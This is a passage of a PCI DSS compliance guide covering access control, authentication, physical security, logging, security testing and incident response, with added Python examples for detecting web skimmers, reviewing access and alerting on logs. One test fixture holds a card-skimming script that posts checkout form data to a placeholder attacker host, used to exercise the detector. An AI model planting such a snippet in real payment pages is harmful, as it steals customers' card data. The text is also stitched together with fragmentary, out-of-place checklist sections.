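    unauthorized: scripts not in the inventory (candidate skimmers);
    missing: inventory scripts no longer present as recorded (removed or altered);
    no_integrity: external scripts whose content cannot be verified by the browser."""
    current = fingerprint(html)
    return {
        "unauthorized": sorted(set(current) - set(authorized)),
        "missing": sorted(set(authorized) - set(current)),
        "no_integrity": sorted(k for k, v in current.items() if k.startswith("src:") and not v),
    }

# Constructed pages; the hosts are placeholders, not real sites.
BASELINE_HTML = """<html><body>
<form id="pay"><input name="pan"></form>
<script src="https://js.psp.example/checkout.js" integrity="sha384-EXAMPLEdigest"></script>
<script>window.checkoutCfg = {merchant: "m-123", currency: "USD"};</script>
</body></html>"""

# Same page after a skimming change: a new external script plus an edited inline block
# that also posts the form contents to the attacker's host.
SKIMMED_HTML = """<html><body>
<form id="pay"><input name="pan"></form>
<script src="https://js.psp.example/checkout.js" integrity="sha384-EXAMPLEdigest"></script>
<script src="https://cdn.evil.example/jquery.min.js"></script>
<script>window.checkoutCfg = {merchant: "m-123", currency: "USD"};
document.getElementById("pay").addEventListener("submit", e => fetch("https://cdn.evil.example/c", {method: "POST", body: new FormData(e.target)}));</script>
</body></html>"""

if __name__ == "__main__":
    inventory = set(fingerprint(BASELINE_HTML))     # the documented, authorized set
    print(check_page(BASELINE_HTML, inventory))
    print(check_page(SKIMMED_HTML, inventory))
```

Fetch the page the way a customer's browser does, on a schedule, and alert on any non-empty unauthorized or missing list; a quiet diff is the evidence the requirement asks for, and the first non-empty one is an incident. Hashing by src alone does not cover a third-party script whose content changes at the same URL, which is exactly why the no_integrity list matters: without SRI, the only defence against that case is re-fetching and hashing the remote file as well.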
Software Updates
Assigned to:___________________________________________________
Assignment date:______________________________________________
Requirement 7
Restrict Access to System Components and Cardholder Data by Business Need to Know

include each role, the definition of each role, access to data resources, current privilege level, and what privilege level is necessary for each person to perform their normal business responsibilities. Users must fit into one of the roles you outline.

MICHAEL OHRAN
CISSP | CISA | QSA | SSF | SSL

This requirement is one of the oldest and most basic parts of the PCI DSS (and data security in general).

There’s no new trend or solution. But not all organizations accurately comply with this requirement or have even tried role-based access at all.

This is all you need to know: don’t give access to people who don’t need it. Cardholder data and card systems should only be accessible to those that need that information to do their jobs. Once you’ve implemented access privileges, make sure to document it.

PCI DSS v4.0 Considerations for Requirement 7

PCI DSS 4.0 raises the expectations of managing user accounts, system accounts, and access privileges. More frequent reviews are required. Prepare for the new requirements by thoroughly documenting all accounts and related access privileges.
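As an added example (not from the guide), a minimal role-based access model and the access review the v4.0 note calls for: each role carries only the permissions its job needs, and the review flags every account whose granted privileges exceed its role, or whose role is not one of the documented roles at all. The roles, permission names and sample accounts are constructed for the demo.

```python
# Constructed role definitions: each role carries only what the job needs.
ROLES = {
    "cashier":   {"pos.sale", "pos.refund.request"},
    "store_mgr": {"pos.sale", "pos.refund.request", "pos.refund.approve", "reports.read"},
    "db_admin":  {"db.backup", "db.schema.change"},
}


def can(role: str, permission: str) -> bool:
    """Authorization check: an unknown role has no permissions at all."""
    return permission in ROLES.get(role, set())


def access_review(accounts: dict) -> dict:
    """Return {user: reason} for every account the periodic review should flag.

    accounts maps user -> {"role": str, "granted": set of permissions actually
    held on the system}. An account is flagged when its role is not a documented
    role, or when it holds privileges its role does not justify.
    """
    findings = {}
    for user, info in accounts.items():
        if info["role"] not in ROLES:
            findings[user] = f"undefined role {info['role']!r}; all privileges unjustified"
            continue
        excess = set(info["granted"]) - ROLES[info["role"]]
        if excess:
            findings[user] = "excess privileges: " + ", ".join(sorted(excess))
    return findings


# Constructed sample of what an export from a POS or back-office system might show.
SAMPLE_ACCOUNTS = {
    "jdoe":       {"role": "cashier",    "granted": {"pos.sale", "pos.refund.request"}},
    "msmith":     {"role": "cashier",    "granted": {"pos.sale", "pos.refund.approve"}},
    "svc_backup": {"role": "db_admin",   "granted": {"db.backup", "cde.pan.read"}},
    "temp01":     {"role": "contractor", "granted": {"reports.read"}},
}

if __name__ == "__main__":
    for user, reason in access_review(SAMPLE_ACCOUNTS).items():
        print(f"{user}: {reason}")
```

Run against real exports, the interesting findings are usually system accounts like svc_backup: they were granted read access "temporarily" and nobody owns the review. Keep the ROLES table as the documented source of truth and diff the live grants against it on the schedule your targeted risk analysis sets.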
REQUIREMENT 7 IT CHECKLIST NOTES
Assigned to:___________________________________________________
Assignment date:______________________________________________
Required Features:
IMPLEMENT MULTI-FACTOR
AUTHENTICATION
Guide to PCI DSS Compliance | PCI DSS Requirements | 79
A few examples of effective multi-factor authentication for remote access could include:

[Figure: a password combined with a one-time password (OTP) generated on a mobile device]
Example 2: The remote user enters a password and
biometric to log in to a smartphone or laptop. The individual
then provides a single authentication factor (e.g., another
password, digital certificate, signed challenge response) to
connect to the corporate network.
Requirement 8:
Use Unique ID Credentials

An easy way to remember complex and long passwords is by using passphrases. Passphrases are groups of words with spaces in between (e.g., “Boba Fett in 1983 ROJ was WAY better than 2022 BoBF!”). A passphrase can contain symbols and upper- and lower-case letters. It doesn’t have to make sense grammatically. Passphrases are generally easier to remember but more difficult to crack than shorter passwords.
REQUIREMENT 8 IT CHECKLIST NOTES
Assigned to:___________________________________________________
Assignment date:______________________________________________
Required Features:
Requirement 9
Restrict Physical Access
to Cardholder Data
Organizations that use POS systems, PIN pads, and mobile devices
or kiosks are required to do three new things:
PHYSICAL SECURITY BEST PRACTICES

Most physical security risks can be prevented with little effort. Here are a few suggestions to improve your physical security:

• While working on your risk assessment, look for physical security risks.
• Lock all office doors and applicable equipment (e.g., mobile devices) when not in use day and night.
• Require passwords to access computers and mobile devices.
• Encrypt your data or don’t store data on these devices.
• Keep track of devices that go in and out.
• Have policies in place for stolen equipment (e.g., a good incident response plan).
• Train staff against social engineering.
• Limit access to CHD through role-based access.

TRAIN EMPLOYEES EARLY AND OFTEN

While you may understand how to protect customer card information, your employees may not. And as employee turnover is so common, regular security training is crucial to secure your business.

Social engineering is a serious threat to both small and large businesses. A social engineer uses social interaction to gain access to private areas, steal information, or perform malicious behavior. Employees fall for social engineering attacks more often than you may think.

Train your employees to question unusual behavior. Establish a communication and response policy in case of suspicious behavior. Train employees to stop and question anyone who does not work for the company, especially if the person tries to enter the back office or network areas.
Requirement 9:
Improve Your
Physical Security
MICHAEL MAUGHAN
SecurityMetrics Security Analyst
CISSP | CISA | QSA
Having electronic access on doors, using cameras to monitor all entries and exits to secure areas, implementing multiple levels of access based on a business need, and approving visitor/employee access are all standard controls for physical security.

Once you know what systems you need to protect, put controls in place that can log and restrict access to them (e.g., badge readers). A good risk assessment would determine an appropriate amount of money to spend on controls necessary to mitigate the identified risk. Something that companies often overlook is the access given to delivery personnel for a night drop. Do you know if that delivery person locked the doors when they left?

Today, you see more organizations hosting their systems in outsourced data centers. Data centers generally have great physical security because they pay attention to the basics. They use cameras to monitor all entries and exits, have multiple levels of access (e.g., lobby, mantrap, hallways, data floors, and cages) to segment physical areas and limit access only to individuals who have been authorized. They also use different levels of authentication requiring both badge and biometrics (e.g., fingerprint, retina) for access.

Digital IP-based cameras are becoming more common, making it easier and more cost effective to deploy and monitor camera systems. These cameras can take snapshots of people and then send those snapshots to security supervisors for verification.
Once you know what systems you need to
protect, put controls in place that can log
and restrict access to them.
It’s also necessary to protect card-swipe devices. Merchants must monitor these devices for tampering or complete replacement. Make sure attackers don’t substitute, bypass, or steal your terminal. You and your employees must know what the tamper properties are (e.g., seals, appearance, weight) and test them often. Security best practice is to mount devices with tamper-resistant stands, screws and tape. If you are using a validated P2PE solution, make sure to follow the physical security requirements located in the corresponding P2PE Instruction Manual.11

Lastly, it’s important to have good security training for your management and employees. Help them understand malicious conduct and motivate them to report suspicious behavior and violations of company policy and procedures.
Assigned to:___________________________________________________
Assignment date:______________________________________________
Things You Will Need To Have:

Policies and procedures that limit the access to your physical media and devices used for processing

Things You Will Need To Do:

Restrict access to any publicly accessible network jack.

Keep physical media secure and maintain strict control over any media being moved within the facility and outside of it.

Keep electronic media in a secure area with limited access (e.g., a locked office clearly marked “Management Only”) and require management approval before the media is moved from its secure location.

NOTES
Things You May Need To Do:
NOTES
System event logs are recorded pieces of information regarding the actions taken on computer systems like firewalls, office computers, or payment applications.

Log monitoring systems (e.g., Security Information and Event Management [SIEM] tools) oversee network activity, inspect system events, alert you to suspicious activity, and store user actions that occur inside your systems. Think of these systems as a lookout, providing you with data breach alerts. The raw log files are also known as audit records, audit trails, or event logs.

Most systems and software generate logs including operating systems, Internet browsers, POS systems, workstations, anti-malware, firewalls, and IDS/IPS. Some systems with logging capabilities do not automatically enable logging, so it’s important to ensure all systems create and collect logs. Some systems generate logs but don’t provide event log management solutions. Be aware of your system capabilities and install third-party log monitoring and management software as needed.

Logs should be collected and sent to a central location, whether an onsite logging server or an online service. Businesses should review their logs daily to search for errors, anomalies, or suspicious activities that deviate from the norm.

From a security perspective, the purpose of a log alert is to act as a red flag when something potentially malicious is happening. Reviewing logs regularly helps identify issues in your system. Given the large amount of log data generated by systems and networking devices, it’s impractical to manually review all logs each day; plus, PCI DSS v4.0 requires automated mechanisms to perform audit log reviews.

Log monitoring software takes care of this issue by using rules to automate log review and only alert on events that might be real issues. Often this is done using real-time reporting software that alerts you via email or text when suspicious actions are detected.

Often, log monitoring software comes with default alerting templates to optimize monitoring and alerting functions immediately. However, not everyone’s network and system designs are the same, and it’s critical to correctly configure what is being monitored and the alerting threshold rules during setup.
Organizations should review their logs daily to search for errors, anomalies, or suspicious activities that deviate from the norm.

LOG MANAGEMENT SYSTEM RULES

Here are some event actions to consider when setting up your log management system rules:

• Password changes
• Unauthorized logins
• New login events
• Malware detection
• Malware attacks seen by IDS
• Denial of service attacks
• Errors on network devices
• File name changes
• File integrity changes
• System object errors
• Data exported
• Shared access events
• Disconnected events
• File auditing
• New service installation
• New user accounts

To take advantage of log management, look at your security strategy and risk assessment and make sure the following steps are taken care of:

• Secure your stored logs so they aren’t maliciously altered by cybercriminals or accidentally altered by well-intentioned employees.
• Assign responsible personnel the duty to review logs daily.
• Set up a team to review suspicious alerts and determine if they are incidents or false positives.
• Spend time to create rules for alert generation (don’t just rely on a template).
• Store logs for at least one year, with three months readily available.
• Frequently check log collection to identify necessary adjustments.
• Identify assets, risks, threats, and vulnerabilities and make sure that all are monitored and settings are configured to generate alerts.
• Confirm everything is being appropriately logged by testing the alert and monitoring configurations.
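As an added example (not from the guide), a small rules engine of the kind the two lists above describe, run over constructed syslog-style lines: it raises one alert when failed logins for the same user and source hit a threshold, another when a login then succeeds from that source, and single alerts for account creation and file-integrity changes. The line format, hostnames, event names and thresholds are all assumptions for the demo; map your own sources onto `parse()`.

```python
import re
from collections import Counter

# Constructed line format: "<ISO timestamp> <host> <event> key=value ..."
LINE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<event>\S+)(?: (?P<rest>.*))?$")

# Constructed sample log: a brute-force that succeeds, a new account, a FIM hit.
SAMPLE_LOG = """\
2024-03-01T02:14:01Z pos-01 auth.fail user=admin src=203.0.113.7
2024-03-01T02:14:03Z pos-01 auth.fail user=admin src=203.0.113.7
2024-03-01T02:14:05Z pos-01 auth.fail user=admin src=203.0.113.7
2024-03-01T02:14:06Z pos-01 auth.fail user=admin src=203.0.113.7
2024-03-01T02:14:07Z pos-01 auth.fail user=admin src=203.0.113.7
2024-03-01T02:14:09Z pos-01 auth.ok user=admin src=203.0.113.7
2024-03-01T02:20:00Z pos-01 user.create user=svc_tmp by=admin
2024-03-01T02:21:00Z db-01 fim.change path=/opt/pos/bin/pos.exe
2024-03-01T09:00:00Z db-01 auth.ok user=jdoe src=10.0.5.4
""".splitlines()


def parse(lines):
    """Turn raw lines into dicts; lines that do not match the format are skipped."""
    events = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        rec = {"ts": m["ts"], "host": m["host"], "event": m["event"]}
        for kv in (m["rest"] or "").split():
            key, _, value = kv.partition("=")
            rec[key] = value
        events.append(rec)
    return events


def evaluate(events, fail_threshold=5):
    """Apply alert rules in timestamp order; returns [(rule, ts, detail), ...]."""
    alerts = []
    fails = Counter()  # (host, user, src) -> consecutive failed logins seen
    for e in events:
        key = (e["host"], e.get("user"), e.get("src"))
        if e["event"] == "auth.fail":
            fails[key] += 1
            if fails[key] == fail_threshold:          # alert once, at the threshold
                alerts.append(("brute_force", e["ts"], key))
        elif e["event"] == "auth.ok":
            if fails[key] >= fail_threshold:         # the attacker got in
                alerts.append(("success_after_failures", e["ts"], key))
            fails[key] = 0
        elif e["event"] == "user.create":
            alerts.append(("new_account", e["ts"], (e["host"], e.get("user"), e.get("by"))))
        elif e["event"] == "fim.change":
            alerts.append(("file_integrity", e["ts"], (e["host"], e.get("path"))))
    return alerts


if __name__ == "__main__":
    for rule, ts, detail in evaluate(parse(SAMPLE_LOG)):
        print(f"{ts} {rule}: {detail}")
```

The success-after-failures rule is the one worth tuning first: five failures followed by a success is a very different event from five failures alone, and it is the pattern that turns a log review into an incident. Firing once at the threshold rather than on every further failure keeps the reviewers from tuning the alert out.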
Requirement 10:
Audit Logs and Log Monitoring

Regular log monitoring means a quicker response time to security events and improved security program effectiveness.

MICHAEL MAUGHAN
SecurityMetrics Security Analyst
CISSP | CISA | QSA

It’s critical that you configure the log monitoring solution correctly so that the appropriate directories, files, security controls, and events are being monitored. Given the large amount of log data generated by systems, it can be time intensive to manually analyze logs (and automated mechanisms to perform audit log reviews will need to be implemented for PCI DSS v4.0).

You likely need SIEM tools to sift through logs and drill down into problems. In the past, SIEM systems were mainly utilized by large corporations, but solutions for smaller companies are now available.

Organizations often struggle with good log review processes. Using SIEM tools can enable you to have real-time alerting to help you recognize a current attack and initiate your incident response plan.

It is a good idea to test your alerting capabilities as part of your incident response test to ensure alerts are being generated and critical systems and applications are being appropriately monitored.

To correlate events over multiple systems you must synchronize system times. All systems should get their system time from internal time servers, which in turn receive time from a trusted external source.

PCI DSS requires service providers to implement a process to detect and respond to failures of critical security controls in a timely manner. You need to be able to detect these failures and have defined incident responses in place. Your response plans not only need to address the response to fix the problem, but they should also identify risks created by the failure, find root causes, document lessons learned, and implement any necessary changes to prevent failures from happening again.
REQUIREMENT 10 IT CHECKLIST NOTES
Assigned to:___________________________________________________
Assignment date:______________________________________________
Things You Will Need To Do:
Keep all audit log records for at least one year and keep
the last three months’ logs readily available for analysis.
This requirement has been included for the following SAQs: SAQ A, SAQ A-EP, SAQ D for Merchant, and SAQ D for Service Providers.

These types of scans and tests are the best line of defense in identifying weaknesses, so they can be corrected before deployment.
PAYMENT PAGE BASICS

What exactly qualifies as a payment page?

• A web-based user interface containing one or more form elements intended to capture account data from a consumer or submit captured account data. The payment page can be rendered as any one of:
  • A single document or instance,
  • A document or component displayed in an inline frame within a non-payment page,
  • Multiple documents or components each containing one or more form elements contained in multiple inline frames within a non-payment page.

For example, if an SAQ A merchant uses a third-party iframe to perform payment capture, the page that embeds the iframe qualifies as a payment page (and the merchant would need to comply with requirement 11.6.1).

However, if the merchant’s website is configured to redirect the customer’s browser to the TPSP’s payment acceptance page, they would mark this requirement as Not Applicable.

VULNERABILITY SCANNING VS. PENETRATION TESTING

To clarify, vulnerability scanning and penetration testing are two different methods to improve security. Some mistakenly believe vulnerability scans are the same as a professional penetration test.

Here are the two biggest differences:

• A vulnerability scan is automated, while a penetration test includes a live person that runs tests against your network.
• A vulnerability scan only identifies vulnerabilities. During a penetration test, the tester attempts to exploit discovered vulnerabilities to gain access to secure systems or sensitive data.

Vulnerability scans and penetration tests work together to identify weaknesses and encourage overall system security.
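As an added example (not from the guide), the kind of check that sits behind the script-management and change-detection expectations for a page that embeds a third-party iframe: list every script the page loads, compare each against an authorized inventory with expected hashes, and report anything unauthorized, changed, or lacking the integrity attribute the inventory says it should carry. The page HTML, the script bodies and the inventory are constructed for the demo; a real monitor fetches the live page and scripts on a schedule.

```python
import base64
import hashlib
from html.parser import HTMLParser


class ScriptCollector(HTMLParser):
    """Collects external <script src> tags (with any integrity attr) and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external, self.inline, self._in_inline = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            if a.get("src"):
                self.external.append({"src": a["src"], "integrity": a.get("integrity")})
            else:
                self._in_inline = True

    def handle_data(self, data):
        if self._in_inline and data.strip():
            self.inline.append(data.strip())

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline = False


def sri(body: bytes) -> str:
    """Subresource Integrity value for a script body (sha256, base64)."""
    return "sha256-" + base64.b64encode(hashlib.sha256(body).digest()).decode()


def audit_payment_page(html: str, fetched: dict, inventory: dict) -> list:
    """fetched: {src: bytes} as retrieved by the monitor; inventory: {src: expected SRI}.
    Returns [(finding, detail), ...]; an empty list means the page matches the inventory."""
    p = ScriptCollector()
    p.feed(html)
    findings = []
    for s in p.external:
        src = s["src"]
        if src not in inventory:
            findings.append(("unauthorized_script", src))
            continue
        if sri(fetched.get(src, b"")) != inventory[src]:
            findings.append(("script_changed", src))
        if s["integrity"] != inventory[src]:
            findings.append(("missing_or_wrong_integrity_attr", src))
    for body in p.inline:
        findings.append(("inline_script_needs_justification", body[:40]))
    return findings


# Constructed inventory, fetched bodies and checkout page.
CHECKOUT_JS = b"window.checkout = { start: function () { /* ... */ } };"
IFRAME_JS = b"/* tpsp iframe loader */"
INVENTORY = {
    "https://shop.example/static/checkout.js": sri(CHECKOUT_JS),
    "https://pay.example.test/v1/iframe.js": sri(IFRAME_JS),
}
FETCHED = {
    "https://shop.example/static/checkout.js": CHECKOUT_JS,
    "https://pay.example.test/v1/iframe.js": IFRAME_JS,
    "https://cdn.example.net/analytics.js": b"/* constructed analytics bundle */",
}
PAGE = f"""<html><body>
<script src="https://shop.example/static/checkout.js" integrity="{sri(CHECKOUT_JS)}"></script>
<script src="https://pay.example.test/v1/iframe.js"></script>
<script src="https://cdn.example.net/analytics.js"></script>
<iframe src="https://pay.example.test/v1/form"></iframe>
</body></html>"""

if __name__ == "__main__":
    for finding, detail in audit_payment_page(PAGE, FETCHED, INVENTORY):
        print(f"{finding}: {detail}")
```

Two caveats a practitioner will hit immediately: an SRI attribute only works for scripts whose content is stable, so a TPSP loader that changes without notice has to be covered by the monitor's change alert and a documented justification rather than a browser-enforced hash; and the inventory must include the scripts the iframe itself loads only if you control that frame, otherwise that is the TPSP's responsibility under the shared-responsibility matrix.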
A vulnerability scan is an automated, high-level test that looks for and reports potential vulnerabilities in systems and applications.

PCI DSS requires two types of vulnerability scanning: internal and external. Think of your environment as a house. External vulnerability scanning is like checking to see if doors and windows are locked, while internal vulnerability scanning is like testing to see if bedroom and bathroom doors have locks that would prevent an intruder from moving to more sensitive areas once they have gained access to the house.

An external vulnerability scan is performed from outside of your network and identifies known weaknesses in perimeter network devices, servers, or applications. All external IPs and domains exposed in the CDE, or that can provide access to the CDE, are required to be scanned by a PCI Approved Scanning Vendor (ASV) at least quarterly. A PCI ASV is required to go through a rigorous yearly recertification process, during which each ASV runs their scanning tool against PCI Council-provided sites planted with vulnerabilities to test which ones the tool finds and which ones it misses.

An internal vulnerability scan is performed from within your network, and it looks at other hosts on the same network to identify internal vulnerabilities. These scans are also required to be performed at least quarterly for PCI compliance. There are a variety of tools to help you comply with internal vulnerability scan requirements. For example, you can:

• Purchase an internal vulnerability scanning tool from your ASV or another provider.
• Download an open source vulnerability scanning tool.

Keep in mind that the scanning tool you use still needs to be configured by a security expert after you purchase or download it.

Vulnerability scanning is an automated method to identify potentially harmful vulnerabilities, so you can remediate them to improve system security.

Typically, vulnerability scanning tools will generate an extensive report of discovered vulnerabilities with references for further research on these vulnerabilities. Some reports even offer suggestions on how to fix discovered issues, and links to fixes and patches where available.

Remember, when it comes to vulnerability scanning, your organization is responsible for scan configuration, actual scanning, findings review, and vulnerability remediation. For PCI compliance, passing quarterly vulnerability scan reports must be provided. This means that if a vulnerability is discovered during a scan that is a high risk, or that causes the scan to fail, you must work to resolve the issue, and then re-scan the affected system to show it was fixed.

VULNERABILITY SCANNING PROS

• Quick, high-level look at potential vulnerabilities
• Very affordable compared to penetration testing
• Automatic (can be automated to run weekly, monthly, quarterly)

VULNERABILITY SCANNING CONS

• False positives
• Businesses must manually research and correct each vulnerability before testing again
• Does not confirm if a vulnerability is exploitable
PENETRATION TESTING BASICS

Penetration testing takes vulnerability detection to the next level. Penetration testers are people that analyze networks and systems, identify potential vulnerabilities, misconfigurations, or coding errors, and try to exploit them. In simple terms, penetration testers attempt to break into your company’s network by exploiting weaknesses the same way a hacker would. However, unlike a hacker, the penetration tester documents and communicates their methods and findings so that you can fix vulnerabilities before an actual hacker gets to them.

PENETRATION TESTING PROS

• Rules out false positives
• Live, manual tests mean more accurate and thorough results

PENETRATION TESTING CONS

• Time (1 day to 3 weeks)
Network Penetration Test

The objective of a network penetration test is to identify security issues with the design, implementation, and maintenance of servers, workstations, and network services. PCI compliance requires these tests be performed from outside, as well as within, your environment, targeting the cardholder data environment at all access points.

Commonly identified issues include:

• Misconfigured software, firewalls, and operating systems
• Outdated, vulnerable software and operating systems
• Insecure protocols
• Weak authentication practices
• Overly permissive access controls

Segmentation Check

A type of network penetration testing, the objective of a segmentation check is to confirm that firewalls and other controls are preventing access to the cardholder data environment (CDE) and other sensitive environments as intended. Basically, segmentation checks confirm if network segmentation is set up properly. Remember that the PCI definition of a segmented CDE means no communication is allowed from non-trusted or out-of-scope networks and systems.

If you use network segmentation to isolate your CDE and reduce PCI scope, segmentation checks are an annual requirement. For service providers that use segmentation to limit PCI scope, you’re required to conduct penetration tests on segmentation controls every six months.

Commonly identified issues include:

• TCP/UDP access is allowed where it is not expected
• ICMP (ping) access is allowed where it should not be

Application Penetration Test

The objective of an application penetration test is to identify security issues resulting from insecure development practices in the design, coding, and deployment of the software.

Commonly identified issues include:

• Injection vulnerabilities (e.g., SQL injection, remote code execution)
• Cross-site scripting vulnerabilities (XSS)
• Broken authentication (i.e., the log-in panel can be bypassed)
• Broken authorization (i.e., low-level accounts can access high-level functionality)
• Improper error handling (sensitive data, or data useful to hackers, exposed in error messages)
• Vulnerable or outdated plugins, libraries, and other application dependencies
Mobile Penetration Test

The objective of a mobile application penetration test is to identify security issues resulting from insecure development practices in the design, coding, and publishing of the software that supports a mobile application.

Commonly identified issues include:

• Insecure local storage
• Information disclosures

Wireless Penetration Test

The objective of a wireless penetration test is to identify misconfigurations of authorized wireless infrastructure and the presence of unauthorized access points.

Commonly identified issues include:

• Insecure wireless encryption standards
• Weak encryption passphrase

Social Engineering

Social engineering assessments are used to test the effectiveness of an organization’s security awareness training. The tester will use typical business scenarios and normal, everyday interactions with personnel to find those that do not follow established security policies and procedures, or are not security minded. The goal of the tester is that of an attacker: to take advantage of the employee and trick them into doing something they shouldn’t.
Requirement 11:
Testing Security

Perform a penetration test at least yearly and after major network changes.

DAVID PAGE
SecurityMetrics Senior Security Analyst
CISSP | CISA | QSA

If your organization is required to be PCI compliant, don’t procrastinate beginning the penetration test process. Finding and engaging a good penetration testing partner can take more time than you realize.

In performing PCI assessments, it is common to see an organization’s penetration testing process, from start to finish, taking as long as everything else involved in the assessment combined. If you wait until your QSA is onsite, or until your SAQ is due, to discuss penetration test scope, methodology, and objectives, you may be unable to meet your PCI compliance deadlines. Start thinking about penetration testing months before your PCI deadlines.

Remember, the required annual penetration test can begin before your PCI assessment, but you can’t be validated as PCI compliant before the testing is finished.

PCI DSS v4.0 Considerations for Requirement 11

Like other areas of the PCI DSS, the version 4.0 update includes additions and clarifications that impact an organization’s vulnerability discovery, testing, and treatment programs.

New internal vulnerability scanning requirements now call for “authenticated” internal scanning. This allows the scanner to simulate a user with access to systems, to better catch vulnerabilities that exist in applications and other software that require users to log in first.

Organizations are now required to define and document their own penetration testing methodology. By doing this, you will be able to clearly communicate infrastructure details, unique attributes of systems and applications, and testing goals and requirements to the penetration testing partner you engage. This allows for more effective testing and more useful results, all in an effort to better secure your environment.
REQUIREMENT 11 IT CHECKLIST
Security Testing
NOTES
Assigned to:___________________________________________________
Assignment date:______________________________________________
NOTES
Things You May Need To Do:
FORMALLY DOCUMENT
BUSINESS PRACTICES
Not only do policies and procedures need to be followed, they also need to be documented. Policies should be written down and easily accessible to all employees.

Documents you’ll want to include in your security policy:

• Employee manuals
ESTABLISH A RISK ASSESSMENT PROCESS

PCI requires all entities to perform an annual risk assessment that identifies critical assets, threats, vulnerabilities, and risks. This exercise helps organizations identify, prioritize, and manage information security risks.

Organizations that take a proactive approach to security will use internal and external resources to identify critical assets, assess vulnerabilities and threats against those assets, and implement a risk management plan to mitigate those threats.

Part of a risk assessment is to assign a ranking or score to identified risks. This will help establish priorities and provide direction on what vulnerabilities you should address first. Methodically identifying, ranking, and mitigating risks can decrease the time an attacker can access and negatively affect your systems, and over time closes the door to the attack.

If you think your employees know how to secure cardholder data and what they’re required to do to be compliant, you’re probably mistaken. In fact, most breaches can be traced back to human error. Although most workers aren’t malicious, they are human, and often forget security best practices or don’t know exactly what is expected of them. Often, people are the weakest link in your overall security scheme.

By informing employees about and holding them accountable for their responsibilities, you can better protect your business and customers.
Employees need to be given specific rules and regular training.
A security awareness program that includes regular training (e.g.,
brief monthly training or communications) will remind them of the
importance of security, especially keeping them up to date with
current security policies and practices. Here are some tips to help
employees protect your sensitive data:
Requirement 12:
PCI Compliance Basics
DAVID PAGE
SecurityMetrics Senior Security Analyst
CISSP | CISA | QSA
The risk assessment is where a lot of organizations struggle with PCI compliance. Many treat it as simply another item on the to-do list. In reality, a risk assessment can be the most important part of your overall security and compliance program, since it helps you identify systems, third parties, business processes, and people that are in scope for PCI compliance. Too many companies approach PCI as simply an “IT issue” and are surprised when they realize PCI compliance touches a lot of other business processes and practices. If you aren’t doing a formal risk assessment now and are intimidated by the process, start small and plan to increase the scope of the review each year.

A risk assessment is a great starting point for establishing a successful security and PCI compliance program.

Another area of difficulty, especially for small organizations, is putting together a comprehensive and relevant security awareness program. Don’t be afraid of what you don’t know! Even if you aren’t a security expert yourself, there is a wealth of security-related information available online, and many resources that make it easy to present a polished training program to your employees. This is one area where the help of an outside security expert or partner can be valuable, since security threats are constantly evolving.

PCI DSS v4.0 Considerations for Requirement 12

The annual risk assessment requirement still calls for the identification of assets, threats, and likelihood of exploitation to occur, but it clarifies that the risk assessment is to be targeted toward each PCI requirement that allows an organization the flexibility to define their own testing frequency or controls.
First you must perform a formal
risk assessment to ensure that the
control will meet the objective of the
requirement and address the risk
that the original control mitigated.
For example, if you are a retail merchant, you have a requirement to periodically inspect each point-of-interaction device (PIN pad) for signs of tampering. How frequently these inspections should occur can vary based on many factors. How frequently you decide to perform them must be based on a formal targeted risk assessment that documents the factors that resulted in your decision.

Another example that requires performance of a targeted risk assessment is if you implement the new Customized Approach to any PCI requirement. If you take this route, you are able to define your own security controls to meet the requirement. However, first you must perform a formal risk assessment to ensure that the control will meet the objective of the requirement and address the risk that the original control mitigated.

technologies you rely on are kept current and are still supported by vendor-provided updates and security patches.

All organizations are now required to document and confirm their PCI scope annually to ensure all flows and locations of cardholder data are taken into account, and any changes to scope are understood. Service providers must perform this scoping exercise at least every six months.

Additionally, service providers now need a process to make sure that organizational changes don’t have a negative impact on PCI compliance and the performance of PCI responsibilities.
Security Testing
Assigned to:___________________________________________________
Assignment date:______________________________________________
Things You Will Need To Do:

Perform a risk assessment annually that, at a minimum, covers the processes and technologies that are involved in handling credit card data, and targets any “periodic” requirements you meet using a Customized Approach

Ensure that each employee completes annual security awareness training, and that you annually review your training program to make sure it is relevant

Screen potential employees that will have access to credit card data or the CDE by performing background checks prior to hire

Annually check the PCI compliance status of your third-party service providers

Perform annual testing of your incident response plan. Include training for each person who plays a role in responding to a potential incident

Perform a PCI scoping exercise to identify all flows and locations of cardholder data in your environment, and any system, processes, or people that can impact the security of your cardholder data environment

Things You May Need To Do:

If you are assessing PCI compliance as a service provider, you are required to establish a charter that assigns responsibility and grants authority to implement your PCI compliance program, including accountability to executive management.

Service providers must perform quarterly reviews to confirm policies and procedures related to PCI compliance are being followed.

Service providers must also perform a PCI DSS scoping exercise every six months, make sure that organizational changes don’t negatively impact PCI compliance, and support their customers’ requests for information about their PCI compliance and PCI responsibility.

NOTES
How To Prepare For A Data Breach

SECTION CONTENTS
How To Prepare For A Data Breach ... 115
What To Include In An Incident Response Plan ... 119
Develop Your Incident Response Plan ... 123
Test Your Incident Response Plan ... 126
Data Breach Prevention Tools ... 128
You can’t afford to be unprepared for the aftermath of a data breach. It’s up to you to control the situation and protect your business. The following section will help you better understand how to successfully stop payment card information from being stolen, mitigate damage, and restore operations as quickly as possible.

Unfortunately, organizations will experience system attacks, with some of these attacks succeeding. If your organization is breached, you may be liable for the following fines, losses, and costs:[11]

DATA BREACH FINES
• Merchant processor compromise fine: $5,000 – $50,000
• Card brand compromise fees: $5,000 – $500,000
• Free credit monitoring for affected individuals: $10 – $30 per card
• Card re-issuance penalties: $3 – $10 per card
• Security updates: $15,000+
• Lawyer fees: $5,000+
• Breach notification costs: $1,000+
• Technology repairs: $2,000+
TOTAL POSSIBLE COST: $50,000 – $773,000+

A well-executed incident response plan can minimize breach impact, reduce fines, decrease negative press, and help you get back to business more quickly. In an ideal world (and if you’re following PCI DSS requirements), you should already have an incident response plan in place, and employees should be trained to quickly deal with a data breach.

If there is no plan, employees scramble to figure out what they’re supposed to do, and that’s when mistakes can occur. For example, if employees wipe a system without first creating images of the compromised systems, you would be prevented from learning what happened and what you can do to avoid re-infection.

Guide to PCI DSS Compliance | How To Prepare For A Data Breach | 115
An incident response plan should be set up to address a suspected data breach in a series of phases, each with specific needs to be addressed. The incident response phases are:

[Figure: incident response phases, pre-breach to post-breach: Phase 1 Prepare, Phase 2 Identify, Phase 3 Contain, Phase 4 Eradicate, Phase 5 Recover, Phase 6 Review]

PHASE 1: PREPARE

